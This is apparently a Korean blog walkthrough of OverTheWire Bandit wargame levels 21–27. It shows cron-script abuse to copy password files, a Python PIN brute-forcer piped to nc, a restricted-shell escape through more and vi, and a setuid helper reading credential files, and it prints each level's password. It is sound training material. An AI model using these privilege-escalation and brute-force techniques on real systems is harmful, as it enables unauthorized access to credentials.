Level 21 -> Level 22
- Hint
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
- cron
사용자가 특정 시간에 반복적으로 작업을 예약하는 명령을 입력할 수 있는 유틸리티 프로그램
min(0-59) | housr(0-23) | day of month(1-31) | month(1-12) | day of week(0-6)(sun-sat) | 명령어
ex) * * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit22 권한으로 /usr/bin/cronjob_bandit22.sh을 1분마다 실행
-> /usr/bin/cronjob_bandit22.sh 내용을 확인해보면 bandit22의 패스워드를 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv 파일에 저장하는 것을 확인할 수 있음
bandit21@bandit:~$ ls /etc/cron.d
cronjob_bandit15_root cronjob_bandit22 cronjob_bandit24 e2scrub_all sysstat
cronjob_bandit17_root cronjob_bandit23 cronjob_bandit25_root otw-tmp-dir
bandit21@bandit:~$ cat /etc/cron.d/cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
WdDozAdTM2z9DiFEQ2mGlwngMfj4EZff
Level 22 -> Level 23
- Hint
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
- 풀이
cron을 확인해보면 /usr/bin/cronjob_bandit23.sh을 실행하는 것을 확인할 수 있고,
파일 내용을 보면, myname은 whoami의 명령어 결과, mytarget은 echo 명령어 결과를 담고 있다.
myname : bandit23 (bandit23 기준)
mytarget : 8ca319486bfbbc3663ea0fbe81326349
/tmp/$mytarget위치에 비밀번호가 저장되어 있으며, /tmp/8ca319486bfbbc3663ea0fbe81326349로 이동하면 비밀번호를 확인할 수 있다.
bandit22@bandit:~$ ls /etc/cron.d/
cronjob_bandit15_root cronjob_bandit22 cronjob_bandit24 e2scrub_all sysstat
cronjob_bandit17_root cronjob_bandit23 cronjob_bandit25_root otw-tmp-dir
bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:~$ whoami
bandit22
bandit22@bandit:~$ echo "I am user bandit23" | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G
Level 23 -> Level 24
- Hint
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
- 풀이
/usr/bin/cronjob_bandit24.sh 셸 스크립트는 /var/spool/bandit24/foo 디렉터리에서 스크립트 파일을 실행하고, 실행이 완료된 스크립트 파일을 삭제하는 작업을 수행한다.
cd /var/spool/$myname/foo || exit 1 : 디렉터리로 이동하고, 이동에 실패하면 스크립트는 종료한다.
for i in * .*; : 현재 디렉터리와 숨김 파일을 모두 반복하며 스크립트 수행한다.
if [ "$i" != "." -a "$i" != ".." ]; : 현재 디렉터리와 상위 디렉터리를 제외하고 파일 처리한다.
if [ "${owner}" = "bandit23" ]; then : 파일의 소유자가 bandit23일 때 다음 작업을 수행한다.
timeout -s 9 60 ./$i : 스크립트 파일을 60초 실행하되, 실행이 너무 오래 걸리면 시그널 9를 사용하여 강제 종료한다.
rm -rf ./$i : 스크립트 파일을 삭제한다.
bandit23@bandit:/$ cd /etc/cron.d/
bandit23@bandit:/etc/cron.d$ ls
cronjob_bandit15_root cronjob_bandit22 cronjob_bandit24 e2scrub_all sysstat
cronjob_bandit17_root cronjob_bandit23 cronjob_bandit25_root otw-tmp-dir
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname/foo || exit 1
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ]; then
timeout -s 9 60 ./$i
fi
rm -rf ./$i
fi
done
foo 디렉터리 아래 셸 스크립트를 작성해 실행되게 하면 된다.
이 때, 셸 스크립트는 bandit24 비밀번호를 읽는 파일로 작성한다.
bandit23@bandit:/var/spool/bandit24/foo$ chmod 777 /tmp/bandit24
bandit23@bandit:/var/spool/bandit24/foo$ vi /tmp/bandit24/exploit.sh
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/bandit24/exploit.sh
#! /bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/bandit24/password
bandit23@bandit:/var/spool/bandit24/foo$ cp /tmp/bandit24/exploit.sh ./exploit.sh
bandit23@bandit:/var/spool/bandit24/foo$ chmod 777 ./exploit.sh
bandit23@bandit:/var/spool/bandit24/foo$ cat /tmp/bandit24/password
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
bandit23@bandit:/var/spool/bandit24/foo$ cat ./exploit.sh
cat: ./exploit.sh: No such file or directory
- chmod
foo 디렉터리 아래 셸 스크립트를 작성한 후 실행권한이 없으므로 권한을 변경해주어야 한다. (rw-rw-r--)
/tmp 디렉터리 아래 다른 사용자가 쓰기 권한이 없으므로 password를 작성할 수 있도록 권한을 변경해주어야 한다. (r-x)
bandit23@bandit:/var/spool/bandit24/foo$ vi ss.sh
bandit23@bandit:/var/spool/bandit24/foo$ ls -al ss.sh
-rw-rw-r-- 1 bandit23 bandit23 6 Sep 15 04:59 ss.sh
bandit23@bandit:/var/spool/bandit24/foo$ mkdir /tmp/tttt
bandit23@bandit:/var/spool/bandit24/foo$ ls -al /tmp/tttt
total 10560
drwxrwxr-x 2 bandit23 bandit23 4096 Sep 15 05:01 .
drwxrwx-wt 984 root root 10801152 Sep 15 05:02 ..
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
Level 24 -> Level 25
- Hint
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
You do not need to create new connections each time
- 풀이
로컬의 30002 포트로 접근하면 bandit25의 비밀번호를 얻을 수 있다.
접근할 때 입력해야하는 비밀번호는 bandit24의 비밀번호 'VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar'와 임의의 4자리 숫자의 조합이다.
- grep -v 옵션
특정 패턴이 포함되지 않은 줄들을 출력
- brute force
import multiprocessing
def brute_force_range(start, end):
for i in range(start, end):
print("VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar " + str(i).zfill(4))
if __name__ == '__main__':
num_processes = 4 # 원하는 병렬 프로세스 수
start_value = 0
end_value = 10000
step = (end_value - start_value) // num_processes
processes = []
for i in range(num_processes):
start = i * step
end = (i + 1) * step if i < num_processes - 1 else end_value
process = multiprocessing.Process(target=brute_force_range, args=(start, end))
processes.append(process)
process.start()
for process in processes:
process.join()
bandit24@bandit:~$ vi /tmp/bandit25/test.pybandit24@bandit:~$ python3 /tmp/bandit25/test.py | nc localhost 30002 > /tmp/bandit25/res
bandit24@bandit:~$ cat /tmp/bandit25/res | grep -v "Wrong"
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
Correct!
The password of user bandit25 is p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
Exiting.
p7TaowMYrmu23Ol8hiZh9UvD0O9hpx8d
Level 25 -> Level 26
- Hint
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
- 풀이
private key를 이용하여 ssh로 접속하면 접속이 끊긴다.
bandit26 shell 확인 -> cat /etc/passwd | grep "bandit26"
bandit26의 shell, /usr/bin/showtext -> ~/text.txt 실행
그렇기 때문에 ssh로 접속하면 more ~/text.txt가 실행된다.
bandit25@bandit:~$ cat /etc/passwd | grep "bandit26"
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
exec more ~/text.txt
exit 0
bandit25@bandit:~$ ls
bandit26.sshkey
bandit25@bandit:~$ ssh -i bandit26.ssheky bandit26@bandit.labs.overthewire.org -p 2220
Warning: Identity file bandit26.ssheky not accessible: No such file or directory.
The authenticity of host '[bandit.labs.overthewire.org]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/home/bandit25/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/home/bandit25/.ssh/known_hosts).
_ _ _ _
| |__ __ _ _ __ __| (_) |_
| '_ \ / _` | '_ \ / _` | | __|
| |_) | (_| | | | | (_| | | |_
|_.__/ \__,_|_| |_|\__,_|_|\__|
This is an OverTheWire game server.
More information on http://www.overthewire.org/wargames
!!! You are trying to log into this SSH server with a password on port 2220 from localhost.
!!! Connecting from localhost is blocked to conserve resources.
!!! Please log out and log in again.
bandit26@bandit.labs.overthewire.org: Permission denied (publickey).
- more 명령어
텍스트 파일의 내용을 한번에 한 화면씩 보여주기 위한 명령어
화면을 줄이고 접속하면 more 명령어가 실행된다.
- more 명령어 v 옵션
vi 에디터가 실행된다.
v
Start up an editor at current line. The editor is taken from the
environment variable VISUAL if defined, or EDITOR if VISUAL is not
defined, or defaults to vi(1) if neither VISUAL nor EDITOR is defined.
/etc/bandit_pass/bandit26 파일도 확인할 수 있지만, 셸을 바꾸지 않으면 ~/text.txt 화면만 보게 된다.
# 명령어 실행결과 가져오기
:r /etc/bandit_pass/bandit26
:e /etc/bandit_pass/bandit26
vi 에디터 안에서 명령어를 실행할 수 있다.
set 명령어를 통해 shell을 바꾸고 실행할 수 있다.
Level 26 -> Level 27
- Hint
Good job getting a shell! Now hurry and grab the password for bandit27!
- 풀이
bandit27-do 파일에 setuid가 설정되어 있어 bandit27 권한을 얻을 수 있고, /etc/bandit_pass/bandit27 파일을 확인할 수 있다.
bandit26@bandit:~$ ls
bandit27-do text.txt
bandit26@bandit:~$ ls -al
total 44
drwxr-xr-x 3 root root 4096 Apr 23 18:04 .
drwxr-xr-x 70 root root 4096 Apr 23 18:05 ..
-rwsr-x--- 1 bandit27 bandit26 14876 Apr 23 18:04 bandit27-do
-rw-r--r-- 1 root root 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 root root 3771 Jan 6 2022 .bashrc
-rw-r--r-- 1 root root 807 Jan 6 2022 .profile
drwxr-xr-x 2 root root 4096 Apr 23 18:04 .ssh
-rw-r----- 1 bandit26 bandit26 258 Apr 23 18:04 text.txt
bandit26@bandit:~$ ./bandit27-do
Run a command as another user.
Example: ./bandit27-do id
bandit26@bandit:~$ ./bandit27-do id
uid=11026(bandit26) gid=11026(bandit26) euid=11027(bandit27) groups=11026(bandit26)
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS
YnQpBuifNMas1hcUFk70ZmqkhUU2EuaS
'linux > OverTheWire' 카테고리의 다른 글
Leviathan: Level 0 - Level 7 (0) | 2023.09.20 |
---|---|
Bandit: Level 27 - Level 33 (0) | 2023.09.17 |
Bandit:Level 13 - Level 20 (0) | 2023.09.12 |
Bandit:Level 11 - Level 12 (0) | 2023.09.10 |
Bandit:Level 1 - Level 10 (0) | 2023.09.10 |